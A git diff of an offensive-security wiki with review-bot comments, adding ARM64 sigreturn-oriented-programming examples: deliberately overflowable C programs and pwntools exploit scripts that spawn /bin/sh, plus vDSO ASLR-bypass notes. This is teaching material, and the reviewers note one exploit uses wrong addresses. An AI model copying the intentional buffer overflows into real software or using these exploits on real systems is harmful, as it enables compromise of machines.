diff --git a/.gitbook/assets/image (1) (1) (1) (1).png b/.gitbook/assets/image (1) (1) (1) (1).png index cee86ab50..e70bceed6 100644 Binary files a/.gitbook/assets/image (1) (1) (1) (1).png and b/.gitbook/assets/image (1) (1) (1) (1).png differ diff --git a/.gitbook/assets/image (1) (1) (1).png b/.gitbook/assets/image (1) (1) (1).png index e70bceed6..ee3722524 100644 Binary files a/.gitbook/assets/image (1) (1) (1).png and b/.gitbook/assets/image (1) (1) (1).png differ diff --git a/.gitbook/assets/image (1) (1).png b/.gitbook/assets/image (1) (1).png index ee3722524..82f1650c7 100644 Binary files a/.gitbook/assets/image (1) (1).png and b/.gitbook/assets/image (1) (1).png differ diff --git a/.gitbook/assets/image (1).png b/.gitbook/assets/image (1).png index 82f1650c7..d798d9edc 100644 Binary files a/.gitbook/assets/image (1).png and b/.gitbook/assets/image (1).png differ diff --git a/.gitbook/assets/image.png b/.gitbook/assets/image.png index d798d9edc..3b1e0666a 100644 Binary files a/.gitbook/assets/image.png and b/.gitbook/assets/image.png differ diff --git a/binary-exploitation/basic-binary-exploitation-methodology/tools/README.md b/binary-exploitation/basic-binary-exploitation-methodology/tools/README.md index 05bb7673e..94f370296 100644 --- a/binary-exploitation/basic-binary-exploitation-methodology/tools/README.md +++ b/binary-exploitation/basic-binary-exploitation-methodology/tools/README.md @@ -125,6 +125,9 @@ pattern search $rsp #Search the offset given the content of $rsp shellcode search x86 #Search shellcodes shellcode get 61 #Download shellcode number 61 +#Dump memory to file +dump binary memory /tmp/dump.bin 0x200000000 0x20000c350 + #Another way to get the offset of to the RIP 1- Put a bp after the function that overwrites the RIP and send a ppatern to ovwerwrite it 2- ef➤ i f 
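Review bot: the added `dump binary memory /tmp/dump.bin 0x200000000 0x20000c350` line in `tools/README.md` hardcodes a start and end address with nothing marking them as example values, unlike the neighbouring `shellcode get 61` line whose comment explains the argument; write the comment as `#Dump memory to file: dump binary memory <file> <start_addr> <end_addr>` (or use `$start`/`$end` placeholders) so readers do not paste the literal range. While touching this block, the trailing context lines of the same hunk carry typos that are worth fixing in the same commit: "offset of to the RIP", "ppatern", "ovwerwrite".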
diff --git a/binary-exploitation/common-binary-protections-and-bypasses/aslr/README.md b/binary-exploitation/common-binary-protections-and-bypasses/aslr/README.md index 132577861..9a8995c78 100644 --- a/binary-exploitation/common-binary-protections-and-bypasses/aslr/README.md +++ b/binary-exploitation/common-binary-protections-and-bypasses/aslr/README.md @@ -307,6 +307,14 @@ gef➤ x/4i 0xffffffffff600800 0xffffffffff60080a: int3 ``` +### vDSO + +Note therefore how it might be possible to **bypass ASLR abusing the vdso** if the kernel is compiled with CONFIG\_COMPAT\_VDSO as the vdso address won't be randomized. For more info check: + +{% content-ref url="../../rop-return-oriented-programing/ret2vdso.md" %} +[ret2vdso.md](../../rop-return-oriented-programing/ret2vdso.md) +{% endcontent-ref %} +
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! diff --git a/binary-exploitation/rop-return-oriented-programing/brop-blind-return-oriented-programming.md b/binary-exploitation/rop-return-oriented-programing/brop-blind-return-oriented-programming.md index 37d9d0409..68cce870b 100644 --- a/binary-exploitation/rop-return-oriented-programing/brop-blind-return-oriented-programming.md +++ b/binary-exploitation/rop-return-oriented-programing/brop-blind-return-oriented-programming.md @@ -40,7 +40,7 @@ This gadget basically allows to confirm that something interesting was executed This technique uses the [**ret2csu**](ret2csu.md) gadget. And this is because if you access this gadget in the middle of some instructions you get gadgets to control **`rsi`** and **`rdi`**: -

https://www.scs.stanford.edu/brop/bittau-brop.pdf

+

https://www.scs.stanford.edu/brop/bittau-brop.pdf

These would be the gadgets: diff --git a/binary-exploitation/rop-return-oriented-programing/ret2csu.md b/binary-exploitation/rop-return-oriented-programing/ret2csu.md index 8204f3aed..77f46535a 100644 --- a/binary-exploitation/rop-return-oriented-programing/ret2csu.md +++ b/binary-exploitation/rop-return-oriented-programing/ret2csu.md @@ -87,7 +87,7 @@ gef➤ search-pattern 0x400560 Another way to control **`rdi`** and **`rsi`** from the ret2csu gadget is by accessing it specific offsets: -

https://www.scs.stanford.edu/brop/bittau-brop.pdf

+

https://www.scs.stanford.edu/brop/bittau-brop.pdf

Check this page for more info: diff --git a/binary-exploitation/rop-return-oriented-programing/ret2vdso.md b/binary-exploitation/rop-return-oriented-programing/ret2vdso.md index 56d4ce767..506a8cb15 100644 --- a/binary-exploitation/rop-return-oriented-programing/ret2vdso.md +++ b/binary-exploitation/rop-return-oriented-programing/ret2vdso.md @@ -67,6 +67,18 @@ or_al_byte_ptr_ebx_pop_edi_pop_ebp_ret_addr = vdso_addr + 0xccb pop_ebx_pop_esi_pop_ebp_ret = vdso_addr + 0x15cd ``` +{% hint style="danger" %} +Note therefore how it might be possible to **bypass ASLR abusing the vdso** if the kernel is compiled with CONFIG\_COMPAT\_VDSO as the vdso address won't be randomized: [https://vigilance.fr/vulnerability/Linux-kernel-bypassing-ASLR-via-VDSO-11639](https://vigilance.fr/vulnerability/Linux-kernel-bypassing-ASLR-via-VDSO-11639) +{% endhint %} + +### ARM64 + +After dumping and checking the vdso section of a binary in kali 2023.2 arm64, I couldn't find in there any interesting gadget (no way to control registers from values in the stack or to control x30 for a ret) **except a way to call a SROP**. Check more info int eh example from the page: + +{% content-ref url="srop-sigreturn-oriented-programming/srop-arm64.md" %} +[srop-arm64.md](srop-sigreturn-oriented-programming/srop-arm64.md) +{% endcontent-ref %} +
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! diff --git a/binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/srop-arm64.md b/binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/srop-arm64.md index b7494b0b8..125322a17 100644 --- a/binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/srop-arm64.md +++ b/binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/srop-arm64.md @@ -14,26 +14,70 @@ Other ways to support HackTricks:
-## Code +## Pwntools example + +This example is creating the vulnerable binary and exploiting it. The binary **reads into the stack** and then calls **`sigreturn`**: + +```python +from pwn import * + +binsh = "/bin/sh" +context.clear() +context.arch = "arm64" + +asm = '' +asm += 'sub sp, sp, 0x1000\n' +asm += shellcraft.read(constants.STDIN_FILENO, 'sp', 1024) #Read into the stack +asm += shellcraft.sigreturn() # Call sigreturn +asm += 'syscall: \n' #Easy symbol to use in the exploit +asm += shellcraft.syscall() +asm += 'binsh: .asciz "%s"' % binsh #To have the "/bin/sh" string in memory +binary = ELF.from_assembly(asm) + +frame = SigreturnFrame() +frame.x8 = constants.SYS_execve +frame.x0 = binary.symbols['binsh'] +frame.x1 = 0x00 +frame.x2 = 0x00 +frame.pc = binary.symbols['syscall'] + +p = process(binary.path) +p.send(bytes(frame)) +p.interactive() +``` + +## bof example + +### Code ```c #include #include +#include void do_stuff(int do_arg){ if (do_arg == 1) - __asm__("mov x0, #139; svc #0;"); + __asm__("mov x8, 0x8b; svc 0;"); return; } + char* vulnerable_function() { char buffer[64]; - fgets(buffer, sizeof(buffer)*3, stdin); + read(STDIN_FILENO, buffer, 0x1000); // <-- bof vulnerability + return buffer; } -int main(int argc, char **argv) { +char* gen_stack() { + char use_stack[0x2000]; + strcpy(use_stack, "Hello, world!"); char* b = vulnerable_function(); + return use_stack; +} + +int main(int argc, char **argv) { + char* b = gen_stack(); do_stuff(2); return 0; } 
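Review bot: in the new `bof example` C code of `srop-arm64.md`, `gen_stack()` returns `use_stack`, the address of a local array, which compilers flag (`-Wreturn-local-addr`) and which is never used, since `b` is unused in both `gen_stack` and `main`; if the `0x2000`-byte array exists only so that enough stack is mapped below `vulnerable_function`'s frame for the `read(STDIN_FILENO, buffer, 0x1000)` and the `SigreturnFrame`, make `gen_stack` return `void` and say so in a comment, because right now a reader cannot tell why the function is there. Likewise `do_stuff(2)` guarantees the `mov x8, 0x8b; svc 0` branch never runs; a comment that it is a deliberate dead-code gadget would help. The change from `mov x0, #139` to `mov x8, 0x8b` is correct (the syscall number goes in `x8` on arm64). The three `#include` lines render here without header names; confirm they name `<unistd.h>` (for `read`/`STDIN_FILENO`) and `<string.h>` (for `strcpy`), which the new code needs.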
@@ -50,9 +94,71 @@ echo 0 | sudo tee /proc/sys/kernel/randomize_va_space # Disable ASLR The exploit abuses the bof to return to the call to **`sigreturn`** and prepare the stack to call **`execve`** with a pointer to `/bin/sh`. -{% hint style="danger" %} -For some reason I don't know the call to **`sigreturn`** is not doing anything so it doesn't work. -{% endhint %} +```python +from pwn import * + +p = process('./srop') +elf = context.binary = ELF('./srop') +libc = ELF("/usr/lib/aarch64-linux-gnu/libc.so.6") +libc.address = 0x0000fffff7df0000 # ASLR disabled +binsh = next(libc.search(b"/bin/sh")) + +stack_offset = 72 + +sigreturn = 0x00000000004006e0 # Call to sig +svc_call = 0x00000000004006e4 # svc #0x0 + +frame = SigreturnFrame() +frame.x8 = 0xdd # syscall number for execve +frame.x0 = binsh +frame.x1 = 0x00 # NULL +frame.x2 = 0x00 # NULL +frame.pc = svc_call + +payload = b'A' * stack_offset +payload += p64(sigreturn) +payload += bytes(frame) + +p.sendline(payload) +p.interactive() +``` + +## bof example without sigreturn + +### Code + +```c +#include +#include +#include + +char* vulnerable_function() { + char buffer[64]; + read(STDIN_FILENO, buffer, 0x1000); // <-- bof vulnerability + + return buffer; +} + +char* gen_stack() { + char use_stack[0x2000]; + strcpy(use_stack, "Hello, world!"); + char* b = vulnerable_function(); + return use_stack; +} + +int main(int argc, char **argv) { + char* b = gen_stack(); + return 0; +} +``` + +## Exploit + +In the section **`vdso`** it's possible to find a call to **`sigreturn`** in the offset **`0x7b0`**: + +
+ +Therefore, if leaked, it's possible to **use this address to access a `sigreturn`** if the binary isn't loading it: ```python from pwn import * @@ -63,32 +169,38 @@ libc = ELF("/usr/lib/aarch64-linux-gnu/libc.so.6") libc.address = 0x0000fffff7df0000 # ASLR disabled binsh = next(libc.search(b"/bin/sh")) -print("/bin/sh in: " + hex(binsh)) - stack_offset = 72 -sigreturn = 0x00000000004006a0 # mov x0, #0x8b ; svc #0x0 -svc_call = 0x00000000004006a4 # svc #0x0 - +sigreturn = 0x00000000004006e0 # Call to sig +svc_call = 0x00000000004006e4 # svc #0x0 frame = SigreturnFrame() frame.x8 = 0xdd # syscall number for execve -frame.x0 = binsh # pointer to /bin/sh -frame.x1 = 0x4343434343434343 # NULL -frame.x2 = 0x0 # NULL +frame.x0 = binsh +frame.x1 = 0x00 # NULL +frame.x2 = 0x00 # NULL frame.pc = svc_call payload = b'A' * stack_offset payload += p64(sigreturn) -payload += b"B" * len(bytes(frame)) - -with open("/tmp/i", "wb") as f: - f.write(payload) +payload += bytes(frame) p.sendline(payload) p.interactive() ``` +For more info about vdso check: + +{% content-ref url="../ret2vdso.md" %} +[ret2vdso.md](../ret2vdso.md) +{% endcontent-ref %} + +And to bypass the address of `/bin/sh` you could create several env variables pointing to it, for more info: + +{% content-ref url="../../common-binary-protections-and-bypasses/aslr/" %} +[aslr](../../common-binary-protections-and-bypasses/aslr/) +{% endcontent-ref %} +
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! diff --git a/generic-methodologies-and-resources/external-recon-methodology/README.md b/generic-methodologies-and-resources/external-recon-methodology/README.md index 22b551ebf..e746f9802 100644 --- a/generic-methodologies-and-resources/external-recon-methodology/README.md +++ b/generic-methodologies-and-resources/external-recon-methodology/README.md @@ -14,7 +14,7 @@ Other ways to support HackTricks:
-
+
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_). @@ -730,7 +730,7 @@ There are several tools out there that will perform part of the proposed actions * All free courses of [**@Jhaddix**](https://twitter.com/Jhaddix) like [**The Bug Hunter's Methodology v4.0 - Recon Edition**](https://www.youtube.com/watch?v=p4JgIu1mceI) -
+
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_). diff --git a/generic-methodologies-and-resources/pentesting-methodology.md b/generic-methodologies-and-resources/pentesting-methodology.md index 937e09f0d..5b75710c6 100644 --- a/generic-methodologies-and-resources/pentesting-methodology.md +++ b/generic-methodologies-and-resources/pentesting-methodology.md @@ -14,7 +14,7 @@ Other ways to support HackTricks:
-
+
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_). @@ -150,7 +150,7 @@ Check also the page about [**NTLM**](../windows-hardening/ntlm/), it could be ve * [**CBC-MAC**](../crypto-and-stego/cipher-block-chaining-cbc-mac-priv.md) * [**Padding Oracle**](../crypto-and-stego/padding-oracle-priv.md) -
+
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_). diff --git a/linux-hardening/bypass-bash-restrictions/bypass-fs-protections-read-only-no-exec-distroless/README.md b/linux-hardening/bypass-bash-restrictions/bypass-fs-protections-read-only-no-exec-distroless/README.md index 3718738d4..e45cb8c1c 100644 --- a/linux-hardening/bypass-bash-restrictions/bypass-fs-protections-read-only-no-exec-distroless/README.md +++ b/linux-hardening/bypass-bash-restrictions/bypass-fs-protections-read-only-no-exec-distroless/README.md @@ -14,7 +14,7 @@ Other ways to support HackTricks: -
+
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_). @@ -133,7 +133,7 @@ However, in this kind of containers these protections will usually exist, but yo You can find **examples** on how to **exploit some RCE vulnerabilities** to get scripting languages **reverse shells** and execute binaries from memory in [**https://github.com/carlospolop/DistrolessRCE**](https://github.com/carlospolop/DistrolessRCE). -
+
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_). diff --git a/network-services-pentesting/pentesting-snmp/README.md b/network-services-pentesting/pentesting-snmp/README.md index 7e2d77e7e..39f244a47 100644 --- a/network-services-pentesting/pentesting-snmp/README.md +++ b/network-services-pentesting/pentesting-snmp/README.md @@ -14,7 +14,7 @@ Other ways to support HackTricks: -
+
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_). @@ -260,7 +260,7 @@ If there is an ACL that only allows some IPs to query the SMNP service, you can * snmpd.conf * snmp-config.xml -
+
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_). diff --git a/network-services-pentesting/pentesting-snmp/cisco-snmp.md b/network-services-pentesting/pentesting-snmp/cisco-snmp.md index 9bb61797b..9b4ed62cc 100644 --- a/network-services-pentesting/pentesting-snmp/cisco-snmp.md +++ b/network-services-pentesting/pentesting-snmp/cisco-snmp.md @@ -12,7 +12,7 @@ -
+
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_). @@ -53,7 +53,7 @@ msf6 auxiliary(scanner/snmp/snmp_enum) > exploit * [https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9](https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9) -
+
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_). diff --git a/network-services-pentesting/pentesting-web/README.md b/network-services-pentesting/pentesting-web/README.md index 895cb29d5..b468644bd 100644 --- a/network-services-pentesting/pentesting-web/README.md +++ b/network-services-pentesting/pentesting-web/README.md @@ -14,7 +14,7 @@ Other ways to support HackTricks: -
+
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_). @@ -365,7 +365,7 @@ Find more info about web vulns in: You can use tools such as [https://github.com/dgtlmoon/changedetection.io](https://github.com/dgtlmoon/changedetection.io) to monitor pages for modifications that might insert vulnerabilities. -
+
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_). diff --git a/network-services-pentesting/pentesting-web/jira.md b/network-services-pentesting/pentesting-web/jira.md index 87e1de4ca..b402d101d 100644 --- a/network-services-pentesting/pentesting-web/jira.md +++ b/network-services-pentesting/pentesting-web/jira.md @@ -14,7 +14,7 @@ Other ways to support HackTricks: -
+
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_). @@ -80,7 +80,7 @@ curl https://jira.some.example.com/rest/api/2/mypermissions | jq | grep -iB6 '"h * [https://github.com/0x48piraj/Jiraffe](https://github.com/0x48piraj/Jiraffe) * [https://github.com/bcoles/jira\_scan](https://github.com/bcoles/jira\_scan) -
+
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_). diff --git a/pentesting-web/file-upload/README.md b/pentesting-web/file-upload/README.md index 0107816ab..071a58d29 100644 --- a/pentesting-web/file-upload/README.md +++ b/pentesting-web/file-upload/README.md @@ -14,7 +14,7 @@ Other ways to support HackTricks: -
+
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_). @@ -340,7 +340,7 @@ More information in: [https://medium.com/swlh/polyglot-files-a-hackers-best-frie * [https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/](https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/) * [https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a](https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a) -
+
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_). diff --git a/pentesting-web/hacking-jwt-json-web-tokens.md b/pentesting-web/hacking-jwt-json-web-tokens.md index b84d318d4..891259401 100644 --- a/pentesting-web/hacking-jwt-json-web-tokens.md +++ b/pentesting-web/hacking-jwt-json-web-tokens.md @@ -14,7 +14,7 @@ Other ways to support HackTricks: -
+
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_). @@ -279,7 +279,7 @@ The token's expiry is checked using the "exp" Payload claim. Given that JWTs are {% embed url="https://github.com/ticarpi/jwt_tool" %} -
+
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_). diff --git a/pentesting-web/ldap-injection.md b/pentesting-web/ldap-injection.md index 1a7d443ec..b264c0e94 100644 --- a/pentesting-web/ldap-injection.md +++ b/pentesting-web/ldap-injection.md @@ -16,7 +16,7 @@ Other ways to support HackTricks: -
+
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_). @@ -235,7 +235,7 @@ intitle:"phpLDAPadmin" inurl:cmd.php {% embed url="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/LDAP%20Injection" %} -
+
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_). diff --git a/pentesting-web/sql-injection/postgresql-injection/README.md b/pentesting-web/sql-injection/postgresql-injection/README.md index e6270f448..3380927a8 100644 --- a/pentesting-web/sql-injection/postgresql-injection/README.md +++ b/pentesting-web/sql-injection/postgresql-injection/README.md @@ -14,7 +14,7 @@ Other ways to support HackTricks: -
+
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_). @@ -106,7 +106,7 @@ SELECT $$hacktricks$$; SELECT $TAG$hacktricks$TAG$; ``` -
+
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_). diff --git a/pentesting-web/xss-cross-site-scripting/README.md b/pentesting-web/xss-cross-site-scripting/README.md index 01f3e1c10..b8f49b4a4 100644 --- a/pentesting-web/xss-cross-site-scripting/README.md +++ b/pentesting-web/xss-cross-site-scripting/README.md @@ -1,6 +1,6 @@ # XSS (Cross Site Scripting) -
+
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_). @@ -1544,7 +1544,7 @@ Find **more SVG payloads in** [**https://github.com/allanlw/svg-cheatsheet**](ht * [https://gist.github.com/rvrsh3ll/09a8b933291f9f98e8ec](https://gist.github.com/rvrsh3ll/09a8b933291f9f98e8ec) * [https://netsec.expert/2020/02/01/xss-in-2020.html](https://netsec.expert/2020/02/01/xss-in-2020.html) -
+
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
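Review bot: in the new `### vDSO` section of `aslr/README.md`, the sentence opens with "Note therefore how", but nothing earlier in that section sets up a consequence, so it reads as dangling; state the claim directly ("If the kernel is compiled with `CONFIG_COMPAT_VDSO`, the vdso address won't be randomized, so ...") and cite the same vigilance.fr reference that the `ret2vdso.md` hunk of this commit uses, since the claim is kernel-config-specific and the reader of this page gets no source for it. It would also help to say which architecture and ABI the option applies to, given that the same commit adds a separate ARM64 section in `ret2vdso.md`.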
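Review bot: typo in the new ARM64 section of `ret2vdso.md`: "Check more info int eh example from the page" should read "Check more info in the example from the page". The section also says the only useful thing found in the vdso is "a way to call a SROP" without saying where; the `srop-arm64.md` hunk of this same commit gives the `sigreturn` call at vdso offset `0x7b0`, so stating that offset here (tied to the kali 2023.2 arm64 observation the text already mentions) keeps the two pages consistent. Finally, "the vdso section of a binary" is imprecise: the vdso is a mapping the kernel places in the process, not a section of the binary; "the vdso mapped into the process" is more accurate.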
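Review bot: heading levels in the second `srop-arm64.md` hunk are inconsistent: `## bof example without sigreturn` is followed by `### Code` and then `## Exploit`, which promotes the exploit to a top-level section; it should be `### Exploit`. In the first exploit, `sigreturn = 0x00000000004006e0 # Call to sig` lost the informative comment style of the line it replaced (`# mov x0, #0x8b ; svc #0x0`); write `# mov x8, 0x8b; svc 0 (in do_stuff)` so the reader knows which instruction sits there, and `frame.x8 = 0xdd # syscall number for execve` could use `constants.SYS_execve` as the Pwntools example in the same file already does. The sentence "if leaked, it's possible to use this address" also conflicts with the examples running under `echo 0 | sudo tee /proc/sys/kernel/randomize_va_space`, where the vdso base is fixed rather than leaked; "if leaked, or known because ASLR is disabled" would be accurate.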
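Review bot: the exploit in the third `srop-arm64.md` hunk, which belongs to the "bof example without sigreturn" section, still uses `sigreturn = 0x00000000004006e0` and `svc_call = 0x00000000004006e4`, addresses inside the first binary's `do_stuff`, but the second binary has no `do_stuff` and so contains neither the `sigreturn` nor the `svc` gadget; the prose directly above says to use the vdso `sigreturn` at offset `0x7b0`, so the script should set `sigreturn = vdso_base + 0x7b0` (base taken from the fixed mapping under disabled ASLR, or from a leak), and `svc_call` must likewise point at an `svc 0` that actually exists in the process (for example the `svc` following the vdso's own `mov x8, 0x8b`, if that is what sits at `0x7b0`, or one in libc), otherwise `frame.pc` lands on the wrong code. As written the block is a copy of the first exploit and will not work against the second binary. The rest of the hunk is fine: replacing `frame.x1 = 0x4343434343434343 # NULL` with `0x00` matches its comment, and dropping the `print` and the `/tmp/i` payload dump is reasonable, though a one-line note that they were debugging aids would not hurt.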
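Review bot: the five `.gitbook/assets/image*.png` binary diffs form a rotation chain visible in the `index` hashes (`image (1) (1) (1) (1).png` receives `e70bceed6`, the old blob of `image (1) (1) (1).png`, which receives `ee3722524`, the old blob of `image (1) (1).png`, and so on down to `image.png`, which gets the new blob `3b1e0666a`); this is GitBook's behaviour when a new `image.png` is added, and the two one-line banner hunks in each of the twelve remaining pages (external recon, pentesting methodology, distroless bypass, SNMP, Cisco SNMP, web, Jira, file upload, JWT, LDAP injection, PostgreSQL injection, XSS) update their image references to follow the shift. Any page that references one of these five asset names and is not in this commit now displays a different picture, so grep the repository for each name and confirm every reference is covered here; giving the new image (presumably the vdso screenshot added in `srop-arm64.md`) a unique filename would avoid the rotation entirely.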